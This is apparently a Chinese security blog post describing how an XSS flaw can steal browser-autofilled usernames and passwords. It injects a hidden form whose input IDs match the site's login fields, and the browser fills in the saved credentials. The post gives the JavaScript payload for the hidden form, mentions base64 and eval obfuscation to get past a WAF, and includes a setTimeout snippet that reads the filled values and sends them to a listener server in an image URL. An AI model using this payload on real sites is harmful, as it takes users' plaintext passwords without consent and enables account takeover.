本文探讨了如何利用XSS攻击获取浏览器自动填充的账户和密码。通过控制网页上的input标签ID,欺骗浏览器在攻击者指定的表单中填充已保存的账户信息。通过构建XSS payload并在目标网站上执行,可以捕获到用户的明文账户和密码,然后利用JS发送到攻击者的服务器。虽然目前Chrome对此进行了限制,但Firefox仍可能受到影响。
我们知道在浏览器存在这样一个功能,当用户登录成功了一个网页后,浏览器会提示我们是否保存密码。如果我们点击同意,那么浏览器就会将账户及密码进行保存。
当我们退出账户再次访问登录页面的时候,我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。
那么浏览器是如何识别到这个网页并自动填充好密码的呢,首先,浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网页中是否有当初我们保存账户及密码时的标签ID是否相同,如果都满足,那么浏览器就会在我们访问的时候,自动的将账户及密码填充进去。
到这里,思路就清晰了,既然浏览器是通过域名加标签ID进行填充,那么如果我们能控制该域名下的标签ID,那么我们就有机会欺骗浏览器在我们控制的标签中填充进去账户及密码。所以我们只需要有一个XSS及可完成攻击。
我们来假设一个场景,我们知道在内网中有一个系统是使用域账户进行登录的,且该系统存在XSS,我们应该如何获取到他的账户和密码。
现在攻击成功的两个条件中我们已经满足了一个了,就是都在相同的domain下,下一步我们需要通过XSS创建一个form标签和两个input标签,并将ID设置为与登录框相同的ID。这两部完成我们就有几率获取到保存的明文账户及密码。
现在我们来构建一下payload
<script type="text/javascript">document.write(")var form_1 = document.createElement("form");
form_1.id = 'f_id';document.getElementsByTagName('div')[0].appendChild(form_1);document.getElementById('f_id').style.display='none';var name_1 = document.createElement("input");var pass_1 = document.createElement("input");
name_1.type = "text";
name_1.name = "username";
name_1.id = "username"
pass_1.type = "password";
pass_1.name = "password";
pass_1.id = "password";
form_1.appendChild(name_1);
form_1.appendChild(pass_1);script>通过这种方式我们就创建了一个隐藏的form框
这个时候我们通过xss 执行试一下效果。PS:具体实现,需要根据目标网页对代码进行微调因为目标站点不允许跨域JS,所以我们通过eval,atob进行xss攻击,首先进行base64编码
然后构造相应的XSS代码
一发xss payload 就被ichunqiu的waf,ban ip ,你们自己懂XSS如何构造吧?手动狗头!可以看到,成功插入了form框
我们直接在console 查看是否填充了账户和密码,成功获取到了账户和密码。
这个时候,我们就只需要添加JS代码让它 去自动获取账户和密码,然后发送到我们的服务器就可以了。使用setTimeout是为了让浏览器填充完毕才发送账户和密码。(截止今天Chrome似乎已经无法通过这种方式获取,Firefox目前任然可以。)
setTimeout(function () {
username = document.getElementById('login_username').value;
password = document.getElementById('login_password').value;
if (username.length > 0) {
var newimg = new Image();
newimg.src = 'http://127.0.0.1:8081/?username=' + username + '&password=' + password;
}
}, 2000);账户密码已成功接收。(这个是几个月前的一次内部攻击中利用到的攻击手法,当时几乎所有浏览器都受影响,现目前只测试了Chrome和FirefoxChrome已不受影响。)
扫一扫
644
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
